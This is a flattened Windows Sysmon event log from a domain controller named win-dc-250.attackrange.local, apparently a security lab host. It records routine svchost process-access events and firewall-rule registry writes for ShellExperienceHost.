13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.279{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708S-1-5-21-2738482597-1131698221-3520544381-500v2.26|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|C=S-1-15-3-1|C=S-1-15-3-4|C=S-1-15-3-15993189-1149757597-3280441496-4094800555|C=S-1-15-3-139472938-1339732804-1469114779-4031155563|C=S-1-15-3-1849407097-1086866290-155560606-3624675039|C=S-1-15-3-2015030808-1290041139-4103196845-2461361948|C=S-1-15-3-2973957182-1175190094-721927306-1883016034|C=S-1-15-3-3633849274-1266774400-1199443125-2736873758|C=S-1-15-3-2105443330-1210154068-4021178019-2481794518|C=S-1-15-3-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|M=microsoft.windows.shellexperiencehost_cw5n1h2txyewy|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|D=C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\|PFN=Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.264{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{82B4FCF2-6949-4A2B-AD8B-032D57DC511B}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.264{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{373DBFFA-A06A-4F97-9A31-A3A3AECA1F51}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 13241300x800000000000000010262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.264{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{E48202E1-C465-424B-80F4-A89C2759F5E8}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 13241300x800000000000000010261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.264{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C17E4F22-5BC7-48A5-8B49-4F9C72E15454}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 10341000x800000000000000010260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 